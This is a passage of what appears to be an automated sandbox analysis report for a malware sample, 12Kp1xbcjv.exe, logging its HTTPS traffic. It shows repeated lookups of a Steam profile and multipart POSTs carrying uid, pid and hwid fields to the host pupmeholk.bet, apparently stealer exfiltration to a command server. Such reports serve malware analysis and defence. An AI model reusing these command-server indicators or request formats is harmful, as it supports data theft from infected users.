                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1624&rtt_var=622&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21381&delivery_rate=1739130&cwnd=68&unsent_bytes=0&cid=9f2b1e24b0030a07&ts=619&x=0"
                                                                                                                                                                                                                                                  2025-03-17 00:04:24 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                                                                                                                                                                                                  2025-03-17 00:04:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.449736104.73.234.1024437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:25 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:26 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:25 GMT
                                                                                                                                                                                                                                                  Content-Length: 36132
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=4f705a518d42933ca7b12f14; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:26 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:26 UTC16384INData Raw: 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 74 61 74 73 2f 22 3e 0a 09 09 09 09 09 09 53 74 61 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 20 73 75 70 65 72 6e 61 76 5f 61 63 74 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22
                                                                                                                                                                                                                                                  Data Ascii: </a><a class="submenuitem" href="https://store.steampowered.com/stats/">Stats</a></div><a class="menuitem supernav supernav_active" href="https://steamcommunity.com/" data-tooltip-type="selector"
                                                                                                                                                                                                                                                  2025-03-17 00:04:26 UTC3762INData Raw: 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 41 6c 69 61 73 65 73 22 3e 0a 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 43 6c 65 61 72 41 6c 69 61 73 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 72 65 61 6c 5f 6e 61 6d 65 20 65
                                                                                                                                                                                                                                                  Data Ascii: <div id="NamePopupAliases"></div><div style="display:none" id="NamePopupClearAliases"></div><div style="clear:both"></div></div></div></div><div class="header_real_name e
                                                                                                                                                                                                                                                  2025-03-17 00:04:26 UTC1576INData Raw: 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 4c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65
                                                                                                                                                                                                                                                  Data Ascii: ... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><div class="footer_content"><span id="footerLogo"><img src="https://community.cloudflare.ste


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.449737104.21.32.14437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:26 UTC279OUTPOST /pLoska HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=gx8tk0NY2v6XxcBt
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 2367
                                                                                                                                                                                                                                                  Host: pupmeholk.bet
                                                                                                                                                                                                                                                  2025-03-17 00:04:26 UTC2367OUTData Raw: 2d 2d 67 78 38 74 6b 30 4e 59 32 76 36 58 78 63 42 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 36 31 30 32 61 36 33 36 61 38 63 34 61 34 33 33 32 63 38 34 33 63 38 62 62 34 63 39 30 65 30 66 31 33 61 39 61 62 30 37 64 0d 0a 2d 2d 67 78 38 74 6b 30 4e 59 32 76 36 58 78 63 42 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 67 78 38 74 6b 30 4e 59 32 76 36 58 78 63 42 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 46 34 32 44 33 34
                                                                                                                                                                                                                                                  Data Ascii: --gx8tk0NY2v6XxcBtContent-Disposition: form-data; name="uid"06102a636a8c4a4332c843c8bb4c90e0f13a9ab07d--gx8tk0NY2v6XxcBtContent-Disposition: form-data; name="pid"1--gx8tk0NY2v6XxcBtContent-Disposition: form-data; name="hwid"549F42D34
                                                                                                                                                                                                                                                  2025-03-17 00:04:27 UTC808INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:27 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pX5i0oABuNQgqtaM%2FQBn%2BC879hO8TBLu4AuJzbU9XzqL2Cclnuk3Tih%2Btlm3aerxYe8EUTE61sbTMAIsqAGTI%2BCulU3BdF350LZChrIKYO8HK%2FEUMry3jjrEMxBB11n9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 92183ba36fbc14ed-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2043&rtt_var=771&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=3282&delivery_rate=1414728&cwnd=91&unsent_bytes=0&cid=49c5fcedfc858026&ts=430&x=0"
                                                                                                                                                                                                                                                  2025-03-17 00:04:27 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                                                                                                                                                                                                  2025-03-17 00:04:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.44973923.192.247.894437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:28 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:28 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:28 GMT
                                                                                                                                                                                                                                                  Content-Length: 26508
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=fd7b43d6873f0edac66c0cc4; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:28 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:28 UTC10166INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                  Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                  2025-03-17 00:04:28 UTC1932INData Raw: 73 65 63 74 69 6f 6e 54 65 78 74 22 3e 0a 09 09 09 09 41 6e 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 3a 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 68 33 3e 46 61 69 6c 65 64 20 6c 6f 61 64 69 6e 67 20 70 72 6f 66 69 6c 65 20 64 61 74 61 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 68 33 3e 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 72 65 74 75 72 6e 4c 69 6e 6b 22 3e 48 65 72 65 27 73 20 61 20 6c 69 6e 6b 20 74 6f 20 74 68 65 20 53 74 65 61 6d 20 43 6f 6d 6d 75 6e 69 74 79 20 3c 61 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 53 74 61 6e 64 61 72 64 22 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                                  Data Ascii: sectionText">An error was encountered while processing your request:<br><br></p><h3>Failed loading profile data, please try again later.</h3><br><br><p class="returnLink">Here's a link to the Steam Community <a class="linkStandard" href="


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.44974023.192.247.894437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:29 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:29 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:29 GMT
                                                                                                                                                                                                                                                  Content-Length: 26508
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=b96fe08812339ed15327ef77; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:29 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:29 UTC10166INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                  Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                  2025-03-17 00:04:29 UTC1932INData Raw: 73 65 63 74 69 6f 6e 54 65 78 74 22 3e 0a 09 09 09 09 41 6e 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 3a 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 68 33 3e 46 61 69 6c 65 64 20 6c 6f 61 64 69 6e 67 20 70 72 6f 66 69 6c 65 20 64 61 74 61 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 68 33 3e 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 72 65 74 75 72 6e 4c 69 6e 6b 22 3e 48 65 72 65 27 73 20 61 20 6c 69 6e 6b 20 74 6f 20 74 68 65 20 53 74 65 61 6d 20 43 6f 6d 6d 75 6e 69 74 79 20 3c 61 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 53 74 61 6e 64 61 72 64 22 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                                  Data Ascii: sectionText">An error was encountered while processing your request:<br><br></p><h3>Failed loading profile data, please try again later.</h3><br><br><p class="returnLink">Here's a link to the Steam Community <a class="linkStandard" href="


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.44974223.192.247.894437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:30 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:31 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:31 GMT
                                                                                                                                                                                                                                                  Content-Length: 26508
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=7a6a9719152d802ca10d9f4d; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
